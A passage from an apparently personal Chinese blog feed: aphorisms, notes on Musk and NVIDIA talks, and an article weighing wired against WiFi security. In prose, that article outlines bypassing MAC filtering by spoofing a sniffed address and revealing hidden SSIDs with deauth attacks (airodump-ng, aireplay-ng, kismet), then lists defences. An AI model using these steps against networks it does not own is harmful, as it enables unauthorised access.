href="https://www.binance.com/zh-CN/blog/from-our-ceo/%E5%B8%81%E5%AE%89%E5%88%9B%E5%A7%8B%E4%BA%BA%E8%B5%B5%E9%95%BF%E9%B9%8Fcz%E6%88%91%E7%9A%84%E6%97%B6%E9%97%B4%E7%AE%A1%E7%90%86%E6%B3%95%E5%88%99-937115089915394194">币安创始人赵长鹏(CZ)的时间管理法则</a></p><h1 id="time-2"><a href="#time-2" class="headerlink" title="time"></a>time</h1><p>一个人在多大程度上珍惜时间，会大大影响这个人的未来发展前景。</p><h1 id="time-3"><a href="#time-3" class="headerlink" title="time"></a>time</h1><p>Do not pause, because time won’t pause!</p><h1 id="knowledge"><a href="#knowledge" class="headerlink" title="knowledge"></a>knowledge</h1><p>Just reading knowledge is not useful, you should build a knowledge system.</p><h1 id="目标"><a href="#目标" class="headerlink" title="目标"></a>目标</h1><p>最近总能看到各种各样的人庆祝26岁生日，有的人26岁赚到100万，有的人26岁买了保时捷，有的人26岁送26辆特斯拉给粉丝…<br>我也订个目标吧，我希望在26岁生日前技术能力能够达到高级红队的水平，能够在AI方面有中级水平，能够在国外旅游4次，能够阅读100部书籍，看100部动漫等等。</p><h1 id="time-4"><a href="#time-4" class="headerlink" title="time"></a>time</h1><p>时间让我忧郁，但时间没空让我犹豫。</p><h1 id="想象"><a href="#想象" class="headerlink" title="想象"></a>想象</h1><p>人们在没做过一个事的时候，有时会把事想象得很难，给自己心理设立了障碍，然后止步不前；有时会把事想象得很简单，没做好准备就闯入其中，然后陷入泥潭。</p><h1 id="愚蠢与AI"><a href="#愚蠢与AI" class="headerlink" title="愚蠢与AI"></a>愚蠢与AI</h1><p>世界上的愚蠢太多了，人类的优势在AI面前将变得荡然无存。</p><h1 id="导火索"><a href="#导火索" class="headerlink" title="导火索"></a>导火索</h1><p>人们常常会把导火索当作是整个事件的起因，并将所有责任归于此处。然而，导火索只是压死骆驼的最后一根稻草。等到导火索发生，就已经无法挽回了。</p><h1 id="叔本华《人生的智慧》"><a href="#叔本华《人生的智慧》" class="headerlink" title="叔本华《人生的智慧》"></a>叔本华《人生的智慧》</h1><p>对于一个年轻人来说，如果他很早就洞察人事、谙于世故，如果他很快就懂得如何与人交接、周旋，胸有成竹地步入社会，那么不论从理智还是道德的角度来考虑，这都是一个不好的迹象。这预示着他的本性平庸。</p><h1 id="desire"><a href="#desire" class="headerlink" title="desire"></a>desire</h1><p>我的欲望不在于外物的获得，而在于精神的掌控。</p>]]></content>
    
    
    <summary type="html">&lt;p&gt;&lt;img src=&quot;/images/Elaina_58.jpg&quot; alt=&quot;伊蕾娜&quot;&gt;&lt;/p&gt;</summary>
    
    
    
    <category term="日志" scheme="http://example.com/categories/%E6%97%A5%E5%BF%97/"/>
    
    
    <category term="日志" scheme="http://example.com/tags/%E6%97%A5%E5%BF%97/"/>
    
    <category term="生活" scheme="http://example.com/tags/%E7%94%9F%E6%B4%BB/"/>
    
  </entry>
  
  <entry>
    <title>2024年3~4月感想</title>
    <link href="http://example.com/2024/04/20/2024%E5%B9%B43~4%E6%9C%88%E6%84%9F%E6%83%B3/"/>
    <id>http://example.com/2024/04/20/2024%E5%B9%B43~4%E6%9C%88%E6%84%9F%E6%83%B3/</id>
    <published>2024-04-19T16:00:00.000Z</published>
    <updated>2024-04-20T07:10:20.018Z</updated>
    
    <content type="html"><![CDATA[<p><img src="/images/%E6%97%A0%E5%90%8D_1.png" alt="无名"></p><span id="more"></span><h1 id="telegram"><a href="#telegram" class="headerlink" title="telegram"></a>telegram</h1><p>如果某个群聊限制转发或下载。<br>那么直接在网页端登录telegram，然后图片就能右键点击下载了。至于视频，使用插件就行。</p><h1 id="狩龙人拉格纳"><a href="#狩龙人拉格纳" class="headerlink" title="狩龙人拉格纳"></a>狩龙人拉格纳</h1><p>在一部名为狩龙人拉格纳的动画里看到了下面这句话：<br>“正因为无所不能才感觉自己走到尽头。”<br>醍醐灌顶啊！很多时候我们处于某个环境之中，成为了那个小环境中的顶点，但一到大环境中会发现其实什么都不是。就好比高中的每一次月考或期末考试，在班上或年级里排在前列就沾沾自喜，实际上到了整个市里或省里，什么都不是。而且这只是中国的高考，全世界还有那么多天赋异禀的人，和他们比起来，什么班上排名或年级排名就是垃圾。<br>但这个问题恐怕很多人并非没有意识到，而是要么因为妄自菲薄，自己给自己划定了上限；要么因为太遥远，而没有竞争的实感。<br>我认为的解决方法：</p><ol><li>网络世界拉近人的距离，多与厉害的人在网上交流，让自身仿佛置身于大环境之中。</li><li>现实中不断奋勇直追，不断走到高处。</li></ol><h1 id="SpaceX招聘最看重的三个特性"><a href="#SpaceX招聘最看重的三个特性" class="headerlink" title="SpaceX招聘最看重的三个特性"></a>SpaceX招聘最看重的三个特性</h1><ol><li>必须有一种原始的，与生俱来的智慧。不一定要精通某个领域，因为聪明人擅长学习。因此原始的智慧和驱动力无比重要。</li><li>SpaceX真正需要的是创业者，希望每位员工都能像CEO一样行事。发现问题，解决问题。即使不在他们的职责范围内。</li><li>如果在其它地方取得过成功，就有可能在SpaceX取得成功。因此面试时会提问，比如说说你做得非常好的一件事，做过非常成功的项目。</li></ol><p>Source: <a href="https://www.bilibili.com/video/BV1dm411679u">https://www.bilibili.com/video/BV1dm411679u</a></p><h1 id="恶之花"><a href="#恶之花" class="headerlink" title="恶之花"></a>恶之花</h1><p>忧郁与理想</p><p>祝福</p><p>凡人的肉眼，不管怎样目光炯炯，<br>总不过是充满哀怨的昏暗的镜子！</p><h1 id="Elon-Musk工作风格"><a href="#Elon-Musk工作风格" class="headerlink" title="Elon Musk工作风格"></a>Elon Musk工作风格</h1><ol><li>喜欢小而精的工作团队。在常规状态下，公司团队会不断壮大。马斯克总是像一股反增长的力量，在招人时会费很多劲。</li><li>乐于开除表现不佳的员工。马斯克默认会裁人。</li><li>没有中层管理人员。肯定是非技术那种。</li><li>工作运作氛围需要充满活力。不喜欢死板的办公氛围，不喜欢大型会议。鼓励人如果会议没用就离开。</li><li>马斯克与团队联系很紧密。CEO直接与基层员工对谈。会听问题，如果发现问题成为了一个阻碍，比如GPU不够，那就直接加倍。</li></ol><h1 id="信息的真实"><a href="#信息的真实" class="headerlink" title="信息的真实"></a>信息的真实</h1><p>事实上，不仅仅是新闻，无论是纪录片还是传记，都是经过了人为筛选编辑的东西，也并非是真相的标志。对于大多数人来说并不会直接接触某一个人或一件事，因此他们获得的信息，往往是经过了人为标记的。<br>因此，我们对于一件事或一个人，一定要谨慎判断，不要轻易下结论。但谨慎判断并不代表不应当发表观点，我们很多时候只需要从结果来判断即可。正如Elon所说：我关心的不是表达的善意，而是良善的落实。</p><h1 id="困境"><a href="#困境" class="headerlink" title="困境"></a>困境</h1><p>再多痛苦，都要忍耐并前行。<br>求人没有任何用处，唯一的办法只有自己尽全力打破困境！</p><h1 id="个体与宏观"><a href="#个体与宏观" class="headerlink" title="个体与宏观"></a>个体与宏观</h1><p>个体重要，但是过多地关注个体就会对宏观失真。我们判断事物大多是基于宏观，而非个体。<br>如果是能力不足，那么关注个体多于宏观无可厚非；如果能力足够，那么关注个体多于宏观就显得狭隘。</p><h1 id="成就与进步"><a href="#成就与进步" class="headerlink" title="成就与进步"></a>成就与进步</h1><p>让人把一点微小的成就都拿出来展示的原因，难道不是因为进步的太慢了吗？</p><h1 id="路径依赖"><a href="#路径依赖" class="headerlink" title="路径依赖"></a>路径依赖</h1><p>路径依赖的成因可以从几个不同的理论角度进行探讨：</p><ol><li><p><strong>锁定效应（Lock-in Effect）</strong>：一旦某种技术或做法被广泛采纳，就会形成一种“锁定”状态，即使存在更好的选择，现有用户也因为各种成本和障碍而难以转换。这种成本不仅包括直接的经济成本，还包括学习成本、协调成本和网络外部性等。</p></li><li><p><strong>增量改进与创新惯性</strong>：在一个已经选择了特定路径的系统中，大多数资源和努力倾向于投向现有路径的增量改进，而不是探索全新的方向。这种惯性可以来自于组织文化、技术专长积累，或是对现有投资的保护。</p></li><li><p><strong>初始条件的敏感依赖</strong>：在路径依赖的早期阶段，即使是非常小的随机事件或决策也能对系统的最终状态产生巨大影响，因为它们决定了系统发展的初步方向。</p></li></ol><h3 id="影响"><a href="#影响" class="headerlink" title="影响"></a>影响</h3><p>路径依赖的影响广泛且深远，它可以限制创新，导致资源配置效率低下，甚至在社会和经济系统中造成长期的不公平现象。然而，路径依赖也有其正面影响，比如通过减少决策不确定性和促进特定领域的专业知识积累。</p><h3 id="识别与应对"><a href="#识别与应对" class="headerlink" title="识别与应对"></a>识别与应对</h3><p>要有效地识别和应对路径依赖，可以采取以下几种策略：</p><ol><li><p><strong>历史分析</strong>：通过分析一个系统的发展历史，可以识别导致当前状态的关键决策和事件，从而理解路径依赖的成因。</p></li><li><p><strong>制度设计与政策干预</strong>：通过设计灵活的制度和政策，可以减少锁定效应，鼓励创新和多样性。例如，政府可以通过补贴或税收优惠来支持新兴技术。</p></li><li><p><strong>教育与培训</strong>：提高个人和组织对路径依赖现象的认识，通过教育和培训促进技术和思维方式的更新。</p></li><li><p><strong>多样性与冗余</strong>：在关键系统和技术选择上保持多样性和冗余，可以减少对单一路径的依赖，提高系统的适应性和韧性。</p></li></ol><p>综合上述不同的理论视角和策略，我们可以更全面地理解路径依赖及其对社会经济系统的影响，从而在决策过程中做出更加明智和可持续的选择。</p><h1 id="晁错论"><a href="#晁错论" class="headerlink" title="晁错论"></a>晁错论</h1><p>古之立大事者，不惟有超世之才，亦必有坚忍不拔之志。</p><h1 id="思考"><a href="#思考" class="headerlink" title="思考"></a>思考</h1><p>不要停止思考。始终保持高速旋转！</p><h1 id="真实"><a href="#真实" class="headerlink" title="真实"></a>真实</h1><p>确保真实，是内心最强大的人，是离宇宙最近的人。<br>马斯克，乔布斯无不如此。<br>痛苦也是真实的一种。</p><h1 id="得意"><a href="#得意" class="headerlink" title="得意"></a>得意</h1><p>为什么很多得意的人容易翻跟头，因为当他们开始得意忘形时，脑子就从高速运转变成低速甚至停止了。</p><h1 id="企业"><a href="#企业" class="headerlink" title="企业"></a>企业</h1><p>企业制胜法宝是朝着正确的方向高速前进。</p><h1 id="2024-4-9-马斯克与挪威慈善家尼古拉·坦根的采访"><a href="#2024-4-9-马斯克与挪威慈善家尼古拉·坦根的采访" class="headerlink" title="2024.4.9 马斯克与挪威慈善家尼古拉·坦根的采访"></a>2024.4.9 马斯克与挪威慈善家尼古拉·坦根的采访</h1><ol><li>马斯克预测2025年年底AI将比任何人聪明。AI的总算力将在5年内超过人类智慧总和。</li><li>马斯克将整个AI发展，细分为人才，数据，硬件三方面。2024年将缺少变压器，再过1-3年，将缺少电力。之后，将会在数据问题上碰壁，可以训练所有的书籍，但是不够；所以要去找所有视频，即使如此数据仍会耗尽。</li><li>马斯克预测Grok v2将优于GPT4，希望5月份完成，需要2万个H100。下一步就是Grok v3，应该会对应于GPT5或更高，需要10万个H100进行连贯训练。然后就会使用两个几乎无限的数据来源：合成数据，或真实世界视频。特斯拉拥有最多的真实世界视频。</li><li>马斯克认为何时能够出现AGI取决于定义。如果是比世界上最聪明的人还要聪明那么在2年内。但除此之外，还存在一个相当大的飞跃，也就是所有机器加起来超过人类全体。所有内容的计算机的总和比所有人类加起来的智慧更高。马斯克认为这还需要5年时间。一种方式是尝试评估数字计算与生物计算的比例大致是多少？</li><li>马斯克认为需要某种机构监管AI，如其它所有监管机构一样。训练AI要尽可能地真实，而不是控制AI去符合政治正确，那会非常危险。现在看来可能相对无害的事情，但如果AI发展起来具有无穷的力量就不好说了。</li><li>AI的人才主要集中于旧金山和伦敦。</li><li>马斯克认为所有车辆将实现全电动化，这只是时间问题。最终也包括飞机、船只和火车。会有一些起伏，不会是完全直线上升，但最终电动化不可避免。</li><li>马斯克认为人类首次登上火星应该在7-9年内，人类已经掌握了在火星自给自足的所有必要技术。生命多行星化所需的资源不到地球资源的1%，只要时间够长，无论在地球上做什么无论如何小心，地球最终都会灭亡。</li><li>马斯克认为真正聪明的人不需要管理，他们自己在管理自己。因为对于一个真正聪明的人他可以随时去任何地方，做任何事。所以我只是说这是我们追求的目标，你是否同意这一目标？如果你愿意，那我们就努力完成它。</li><li>马斯克认为如果你想做出完美的产品，就必须坚持注重细节。</li><li>马斯克认为当事情变得非常紧张时，你基本上每时每刻都在工作。危机时刻会让人很痛苦，但有时这就是成功与失败的区别。</li><li>马斯克认为最好的进攻和防守就是速度。速度的力量作为一个竞争的维度没有受到充分重视。需要在正确的方向上高速前进。</li><li>马斯克认为除非绝对必要，否则你不想要公司承担风险。对于创新来说，最重要的一点是你必须接受失败，你必须始终关注一个组织的激励结构，该组织是否恰当地激励了创新？</li><li>马斯克认为大多数博士都是无用的。客观地说，大多数博士论文的实用性都很低，甚至为零。因为没人使用它们。</li><li>马斯克玩《文明》游戏让他意识到：技术是分阶段的。这种想法对公司来说是一个很有帮助的框架。</li></ol><h1 id="灾难"><a href="#灾难" class="headerlink" title="灾难"></a>灾难</h1><p>如果你认为灾难不会落到自己头上，那只能说明你没准备好。</p><h1 id="觉悟"><a href="#觉悟" class="headerlink" title="觉悟"></a>觉悟</h1><p>最好不要和没有觉悟的人一起做项目，因为这类人在路上一遇到什么困难，就会产生负面影响。<br>比如今天看到一个做copymanga的开源无广告项目，因为别人卖了他的软件停了项目。<br>我就觉得搞笑了，你在做之前难道没想过这种情况吗？遇到这么点状况就这样的人能成什么事呢？</p><h1 id="恐惧"><a href="#恐惧" class="headerlink" title="恐惧"></a>恐惧</h1><p>如果事情足够重要，就要去克服恐惧。</p><h1 id="规律"><a href="#规律" class="headerlink" title="规律"></a>规律</h1><p>我突然意识到，很多话我们只是在听的过程中把它变成了不可变的金科玉律。因此重温马斯克的这句话才更有感觉：唯一需要遵循的只有物理定律，其它都是建议。</p><p>一个例子：<br>陀思妥耶夫斯基说：爱具体的人，不要爱抽象的人。罗翔也说了这样的话。于是我在潜移默化中，将这句话变成了不可变的金科玉律。每当看到有人说马斯克爱抽象的人而不爱具体的人时，我就会感到困惑，这样做是不是对的呢？但是我突然发现，这只是前人说的话而已。尽管看似很有道理，然而却不一定是真理。这些道理可能只是接近真理罢了。</p><h1 id="NVIDIA-GTC-2024-黄仁勋"><a href="#NVIDIA-GTC-2024-黄仁勋" class="headerlink" title="NVIDIA GTC 2024 黄仁勋"></a>NVIDIA GTC 2024 黄仁勋</h1><p>看了黄仁勋在NVIDIA GTC 2024上的演讲，真是感觉不可思议。<br>Blackwell 比上一代推理能力强30倍<br>未来将使用数字化构建一切，再用实体化构建。<br>CoreDiff — AI预测天气 原有能力的1000倍以上<br>NVIDIA推理微服务(NIM)—负责完成工程师的所有任务，将大任务下分为小步骤<br>NeMo微服务—整理准备数据<br>第一个板块是发明AI模型技术，运行AI模型并将其封装供你使用。<br>第二个板块是提供模型定制开发工具。首先是发明AI技术，其次是支持模型定制研发。<br>第三个板块是提供基础设施，实现模型的微调和部署。可以部署在NVIDIA的DGX Cloud基础设施上。也可部署在本地，或其它任何地方。</p><p>AI数据库(NVIDIA NeMo Retriever)—将原始数据知识重新编写索引，存入向量数据库，获取结构化或非结构化数据了解其含义，对其含义进行编码。<br>物理AI(Omniverse)—(OVX)—AI的现实数字化<br>Jetson—人形机器人</p><p>NVIDIA GTC 2024演讲总结：</p><ol><li>新工业革命。每个数据中心都要加速，未来几年将会有1万亿美元的数据中心实现现代化。新的软件开发方法已经出现—生成式AI。它将创建新的基础设施，专门用于做一件事，不是为多用户数据中心服务，而是为AI生成器。这种AI生成技术将创造出极具价值的软件。</li><li>引领这场革命的计算机—Blackwell架构。用于生成式AI、支持万亿参数。</li><li>新型计算机可创造新型软件。新的软件应该以新的方式分发。一方面，它可以成为云端的一个终端，易于使用，但同时还能让你随身携带（NIM）。</li><li>这些NIM将帮助创建未来的新型应用。不需要从零编写，而是要像整合团队一样整合他们。结合AI技术—NIM，AI工具—NeMo以及基础设施—DGX Cloud支持的AI代工服务。</li><li>未来所有可移动的物体都将采用机器人技术。这些系统都需要一个数字孪生平台—Omniverse。它是机器人世界的操作系统。</li></ol><h1 id="重要"><a href="#重要" class="headerlink" title="重要"></a>重要</h1><p>听了下OpenAI的Sam Altman的访谈片段。大致意思是要做真正重要的事，而不是让自己陷入不重要的事之中。让自己感觉做了很多事一样。<br>我感觉最近几天忙碌思考什么方案好，什么话术有用。就是所谓的不重要的事。</p><p>我思考那些乱七八糟的事，虽然是事本身的完成有必要，但在这件事的处理中，也需要控制时间，不要陷入一种没完没了的处理之中。的确，如果能把这件事处理得很好，这是不错。然而这偏离了自己的最终目标，一件事可能还好，事情多了就慢慢赶不上自己最初的预期了。这让我想到了算法中的贪心算法，贪心算法在每一个局部是最优的，希望能够导致全局最优解。问题在于贪心算法并不总是达成最优解。这给人的一个启发是，由于人的精力有限，为了达成最终目标，有时需要放弃局部最优(单件事做到最好)，边际效益递减做到较好与最好之间花的时间精力有时会比从零开始做到较好更多，更多关注全局追求全局最优。<br>确认目标是值得的，确保方向是正确的，确实前行是高速的。</p><h1 id="崇拜"><a href="#崇拜" class="headerlink" title="崇拜"></a>崇拜</h1><p>不要陷入到特定名人的崇拜中，把目光转向自己。</p>]]></content>
    
    
    <summary type="html">&lt;p&gt;&lt;img src=&quot;/images/%E6%97%A0%E5%90%8D_1.png&quot; alt=&quot;无名&quot;&gt;&lt;/p&gt;</summary>
    
    
    
    <category term="日志" scheme="http://example.com/categories/%E6%97%A5%E5%BF%97/"/>
    
    
    <category term="日志" scheme="http://example.com/tags/%E6%97%A5%E5%BF%97/"/>
    
    <category term="生活" scheme="http://example.com/tags/%E7%94%9F%E6%B4%BB/"/>
    
  </entry>
  
  <entry>
    <title>论有线宽带与无线WiFi的安全性比较</title>
    <link href="http://example.com/2024/03/31/%E8%AE%BA%E6%9C%89%E7%BA%BF%E5%AE%BD%E5%B8%A6%E4%B8%8E%E6%97%A0%E7%BA%BFWiFi%E7%9A%84%E5%AE%89%E5%85%A8%E6%80%A7%E6%AF%94%E8%BE%83/"/>
    <id>http://example.com/2024/03/31/%E8%AE%BA%E6%9C%89%E7%BA%BF%E5%AE%BD%E5%B8%A6%E4%B8%8E%E6%97%A0%E7%BA%BFWiFi%E7%9A%84%E5%AE%89%E5%85%A8%E6%80%A7%E6%AF%94%E8%BE%83/</id>
    <published>2024-03-30T16:00:00.000Z</published>
    <updated>2024-03-31T06:29:02.509Z</updated>
    
    <content type="html"><![CDATA[<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>因为不太了解硬件安全方面，最近在纠结这个问题。所以写了一篇文章来记录。</p><span id="more"></span><h1 id="宽带与WiFi概述"><a href="#宽带与WiFi概述" class="headerlink" title="宽带与WiFi概述"></a>宽带与WiFi概述</h1><p>宽带即采用有线的方式传输数据。<br>PPPoE协议的工作流程包含发现和会话两个阶段，发现阶段是无状态的，目的是获得PPPoE终结端（在局端的ADSL设备上）的以太网MAC地址，并建立一个唯一的PPPoE SESSION-ID。发现阶段结束后，就进入标准的PPP会话阶段。</p><p>WiFi即采用无线的方式连接。<br>WiFi普遍的定义是一种允许电子设备连接到一个无线局域网（WLAN）的技术，有些WiFi设置成加密状态，也有些WiFi是开放的、不需要密码即可接入的。最常见的WiFi信号来自于无线路由器，无线路由器如果本身连接到了互联网，那么它也可以被称为热点。<br>AP（Access Point）即相当于无线路由器的作用，有线网络通过无线路由器等设备，自行建立一个无线局域网环境，使得具备无线接入功能的设备以无线方式接入路由器内网，通过路由器实现上网功能。<br>AP以每100ms一次的频率由Beacons（信号台）将无线网络的SSID（Service Set Identifier）发射出去，确保覆盖范围内所有的无线客户端能够收到这个SSID广播封包，并依据无线客户端的需求决定是否要和此AP进行网络连接。</p><h1 id="GPT4对于宽带与WiFi的安全性看法"><a href="#GPT4对于宽带与WiFi的安全性看法" class="headerlink" title="GPT4对于宽带与WiFi的安全性看法"></a>GPT4对于宽带与WiFi的安全性看法</h1><p>在网络安全和保密的角度看，有线宽带和WiFi上网各有其优缺点。以下是从安全性和保密性的角度对两种网络连接方式的详细比较：</p><h3 id="有线宽带上网"><a href="#有线宽带上网" class="headerlink" title="有线宽带上网"></a>有线宽带上网</h3><p><strong>优点</strong>：</p><ol><li><strong>物理安全性</strong>：有线连接需要物理接入点，这意味着攻击者需要实际接触到网络线缆或设备才能访问网络。这增加了未经授权访问的难度。</li><li><strong>更难被拦截</strong>：与无线信号相比，有线信号更难被远程拦截。攻击者需要对物理线路进行接触，才能尝试截取数据传输。</li><li><strong>无需加密</strong>：虽然加密仍然是提高数据传输安全性的好方法，但有线网络由于其物理特性，相对于无线网络来说，即使未加密也更难被外部访问。</li><li><strong>VLAN隔离</strong>：在较大的有线网络中，使用虚拟局域网（VLAN）技术可以提高网络的安全性，通过逻辑上分隔网络来限制广播域和隔离敏感数据流。</li><li><strong>网络隔离和控制</strong>：在有线网络中，更容易通过物理端口和虚拟局域网（VLAN）来实现网络隔离，从而限制攻击者的横向移动。如果入侵被限制在特定的网络段内，那么潜在的损失可能会减少。</li><li><strong>监控和检测</strong>：有线网络可能更容易进行流量监控和异常检测，因为网络管理员可以更精确地控制和审计通过物理端口的流量。</li></ol><p><strong>缺点</strong>：</p><ol><li><strong>灵活性有限</strong>：有线网络的使用受限于物理连接。在需要频繁移动设备或在没有预先布线的区域提供网络接入时，可能会遇到困难。</li><li><strong>部署成本</strong>：对于大型建筑或多层办公楼，布设有线网络可能需要更多的时间和成本，特别是在需要钻孔或铺设大量网络线缆的情况下。</li><li><strong>端口安全</strong>：在有线网络中，物理接入点（如以太网端口）可能成为安全漏洞。未经授权的设备可以通过物理方式接入网络。因此，端口安全（如802.1X认证）对于防止未经授权的接入至关重要。</li><li><strong>物理安全漏洞</strong>：虽然物理接入更难，但不可忽视物理安全漏洞，如未锁好的网络机房或易受攻击的网络基础设施。</li><li><strong>物理访问</strong>：如果攻击者通过钓鱼攻击获得了网络内部主机的控制权，并且能够进一步获得物理访问权限，那么他们可能会尝试对网络设备进行物理篡改，如安装监听设备。</li></ol><h3 id="WiFi上网"><a href="#WiFi上网" class="headerlink" title="WiFi上网"></a>WiFi上网</h3><p><strong>优点</strong>：</p><ol><li><strong>便利性和灵活性</strong>：WiFi提供了无线网络连接，极大地提高了设备的移动性和网络接入的便利性。用户可以在网络覆盖范围内自由移动设备。</li><li><strong>易于部署</strong>：在没有物理网络基础设施的环境中，部署WiFi网络相对简单快捷。</li><li><strong>网络隔离</strong>：使用访客网络（Guest Network）功能可以为访客提供网络接入，同时将其流量与内部网络隔离，保护内部网络不受潜在的恶意行为影响。</li><li><strong>灵活性</strong>：WiFi网络提供了更大的灵活性，使得在发生入侵时，快速变更网络配置（如更改SSID和密码）相对容易，这可能有助于迅速隔离受感染的设备，减少损失。</li></ol><p><strong>缺点</strong>：</p><ol><li><strong>信号泄露</strong>：无线信号可以穿透墙壁和窗户，可能被建筑物外的未经授权的设备接收到，增加了被监视和攻击的风险。</li><li><strong>加密和安全设置</strong>：为了保护数据传输的安全性，WiFi网络需要配置加密和安全措施（如WPA2或WPA3加密）。不正确或过时的配置可能导致安全漏洞。</li><li><strong>更易受到某些攻击</strong>：WiFi网络相对更容易受到中间人攻击（MITM）、网络钓鱼和邪恶孪生（Evil Twin）等攻击。</li><li><strong>需要额外的安全措施</strong>：为了提高WiFi网络的安全性，可能需要采取额外的安全措施，如设置强密码、定期更换密码、隐藏SSID、限制MAC地址访问等。</li><li><strong>WPS漏洞</strong>：WiFi保护设置（WPS）旨在简化网络的安全设置，但在某些实现中存在安全漏洞，可能允许攻击者绕过WiFi密码。</li><li><strong>信号覆盖控制</strong>：无线信号的覆盖范围应控制在需要服务的区域内，避免信号泄露到不需要的区域（如街道或邻近建筑），减少潜在的攻击面。</li><li><strong>固件更新</strong>：无线路由器和接入点的固件应保持最新，以修补已知的安全漏洞。</li><li><strong>横向移动</strong>：在WiFi网络中，攻击者可能更容易在未经充分隔离的网络内进行横向移动，寻找其他脆弱目标。</li><li><strong>信号泄露</strong>：WiFi信号的泄露可能使得攻击者在没有物理接入的情况下，通过无线方式继续探测和攻击网络内的其他设备。</li></ol><p>当黑客通过钓鱼或其他远程攻击手段成功入侵到主机时，他们获得的访问权限和能够造成的损失通常与网络连接类型（有线宽带或WiFi）关系不大。</p><h1 id="个人看法"><a href="#个人看法" class="headerlink" title="个人看法"></a>个人看法</h1><p>如果说流量控制和隔离的话，有线网络也能通过相应的网络设备和策略来实现类似的功能。<br>如果说是隐藏SSID和白名单mac，想要破解也不是无法做到。</p><ol><li><p>突破MAC地址过滤<br>MAC地址是网络设备的唯一网络地址标示，本意为媒体访问控制，可以理解为网络设备的物理地址，对于每台网络设备，MAC地址是固定且唯一的，采用十六进制数表示，共六个字节。在前篇文章介绍的破解过程中，无线网卡、终端、路由器等设备的MAC地址，都是我们用来进行破解的重要数据。<br>MAC地址过滤防护机制，即通过预先在无线路由器内设定允许或者禁止访问本地网络的设备MAC地址列表，以白名单&#x2F;黑名单的方式来控制网络设备的接入权限。这项安全机制在有线路由器和无线路由器中均存在，并不以连接方式有区别。路由器在接收到网络接入请求后，根据接入终端的MAC地址对照本地过滤设置规则中的MAC地址，判定是否允许网络终端进行接入行为。<br>如果本地网络的网络终端比较固定，最好采用“允许”即白名单的方式，固定化终端MAC地址，也就是本地网络中只允许特定的几个终端进行接入。这种方式比“禁止”的黑名单方式安全性更高，但使用灵活度低。无论是白名单还是黑名单，路由器对接入终端的权限判断都基于MAC地址这单一选项，这就给攻击者创造了一种突破思路。<br>主要的突破思路，就是通过修改本地的网络设备MAC地址，绕过目标路由器的过滤名单达到突破的目的。前文我们讲到，MAC地址虽然理论上唯一，但可以通过软件修改等方式，将本地设备的MAC地址临时修改为所需要的MAC地址。突破的步骤可以分为上图所示的四个步骤：<br>•探测合法无线客户端的MAC地址，可以使用airodump-ng工具实现<br>•修改攻击网卡的MAC地址，这个步骤可以在Windows或Linux中进行<br>•重新装载网卡设备，并检查是否已经更改成功<br>•连接无线接入点，完成突破防护的目的</p></li><li><p>突破隐藏无线网络SSID<br>在无线路由器的设置中，如果目标使用了隐藏SSID选项，那么正常情况下，打开手机、平板的无线网络，是搜索不到目标的网络名称的。这种情况下只有知道了网络SSID名称和密码并且手动添加输入才能够连接。但是要特别强调，关闭SSID广播功能仅仅是关闭了无线路由器广播信标帧中的SSID部分，并不代表无线路由器的无线信号就不发射和接收了。虽然SSID被隐藏，但是无线路由器的MAC地址以及其他信息还是能够探测到的。<br>第一种使用airodump-ng和aireplay-ng进行DeAuth攻击获取SSID。在将无线网卡加载激活至监听模式后，使用airodump-ng进行信号探测。<br>第二种通过被动探测的方式进行SSID获取，比较流行的一种工具就是kismet，这款工具也在Kali中集成了。被动探测相对于主动探测，隐蔽性更好，而且探测通信更加可靠。某些无线路由器对于主动探测，可以配置为不回复将SSID设置为“任意”的探测请求帧，若为被动探测，只有在有合法客户端与无线接入点进行连接时才能探测到SSID，因为只有产生连接认证时，SSID才能以明文方式出现在无线电信号中。</p></li></ol><p>在一个密室里面，人员进出都经过了专门检查，那么即使是近源，也应该接触不到宽带。而WiFi的话因为信号暴露则会更容易。</p><h1 id="措施"><a href="#措施" class="headerlink" title="措施"></a>措施</h1><p>如果使用宽带，则需要在密室，访问人员进出都需要经过验证。需要配置VLAN隔离。<br>如果使用WiFi，则需要修改SSID名称并隐藏SSID，密码设置为包含数字大小写字母特殊字符16位以上（最好每月更改一次密码），白名单MAC地址，使用WPA3协议，启用路由器防火墙。</p><h2 id="启用路由器防火墙方法"><a href="#启用路由器防火墙方法" class="headerlink" title="启用路由器防火墙方法"></a>启用路由器防火墙方法</h2><p>在路由器上启用防火墙通常涉及登录到路由器的管理界面并修改安全设置。不同品牌和型号的路由器可能会有不同的界面和选项，但大多数路由器都提供了某种形式的防火墙功能。以下是一般步骤：</p><h3 id="1-访问路由器管理界面"><a href="#1-访问路由器管理界面" class="headerlink" title="1. 访问路由器管理界面"></a>1. 访问路由器管理界面</h3><ol><li><p><strong>找到路由器的IP地址</strong>：通常是<code>192.168.1.1</code>、<code>192.168.0.1</code>或类似地址。你可以在路由器的底部标签或手册中找到这个信息。如果不确定，也可以通过电脑的网络设置查看默认网关地址。</p></li><li><p><strong>登录</strong>：在浏览器的地址栏输入路由器的IP地址，并按回车键。这将打开路由器的登录页面。输入管理员用户名和密码进行登录。如果你未曾更改过这些信息，它们可能是出厂设置，通常也可以在路由器的手册或底部标签上找到。</p></li></ol><h3 id="2-启用防火墙"><a href="#2-启用防火墙" class="headerlink" title="2. 启用防火墙"></a>2. 启用防火墙</h3><ol><li><p><strong>查找防火墙设置</strong>：登录后，查找安全性或防火墙设置的选项。这可能在“高级设置”、“安全”或“防火墙”等部分。</p></li><li><p><strong>启用防火墙功能</strong>：在防火墙设置中，应该有一个选项来启用或禁用防火墙。确保这个选项被激活。在一些路由器上，防火墙可能默认就是开启的。</p></li><li><p><strong>配置防火墙规则</strong>（可选）：一些高级路由器允许你配置具体的防火墙规则，比如阻止或允许特定的入站和出站流量、端口或IP地址。如果你对网络安全有特定需求，可以根据需要调整这些设置。</p></li><li><p><strong>保存设置</strong>：更改设置后，记得保存更改。路由器可能需要重新启动才能应用新的设置。</p></li></ol><h3 id="3-测试防火墙"><a href="#3-测试防火墙" class="headerlink" title="3. 测试防火墙"></a>3. 测试防火墙</h3><ul><li><strong>测试连接</strong>：更改设置后，测试网络连接确保一切正常工作。你可以尝试访问几个网站，确保防火墙设置没有意外阻止正常的网络流量。</li></ul><h3 id="注意事项"><a href="#注意事项" class="headerlink" 